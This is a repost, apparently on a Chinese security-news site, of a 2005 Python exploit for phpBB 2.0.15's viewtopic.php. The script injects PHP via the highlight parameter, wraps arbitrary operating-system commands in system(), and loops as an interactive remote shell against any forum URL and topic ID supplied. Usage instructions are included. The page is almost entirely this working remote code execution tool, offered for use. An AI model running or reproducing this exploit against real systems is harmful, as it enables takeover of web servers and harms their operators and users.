首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB 2.0.15 viewtopic.php Remote PHP Code Execution Exploit
来源:rattle@awarenetwork.org 作者:rattle 发布时间:2005-07-04  

phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit

#!/usr/bin/pyth0n

print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."

import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

INITTAG = '<g0>'
ENDTAG = '</g0>'

def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"


def usage():
print """Usage: %s <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)


if __name__ == '__main__':

if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()

if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''

url = urlunparse(url)
if url[-1] != '/': url += '/'

topic = quote_plus((sys.argv[2]))

while 1:

try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]

if (cmd == "exit"): break
else: cmd = makecmd(cmd)

out = _ex % (url,topic,cmd)

try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass

else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;

print "EXPLOIT FAILED"

except:
continue



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows SMB客户端Transaction响
·WordPress 1.5.1.2 XMLRPC Modul
·Microsoft Message Queuing Remo
·Pear XML-RPC Library 1.3.0 Rem
·Stream/raped DoS
·Xoops <= 2.0.11 XMLRPC Modu
·TCP-IP Datalook DoS Vulnerabil
·phpBB <= 2.0.15 Remote SQL
·Veritas Backup Exec Agent CONN
·Sudo <= 1.6.8p8 Pathname Va
·Microsoft Outlook Express NNTP
·Mozilla FireFox <= 1.0.1 GI
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved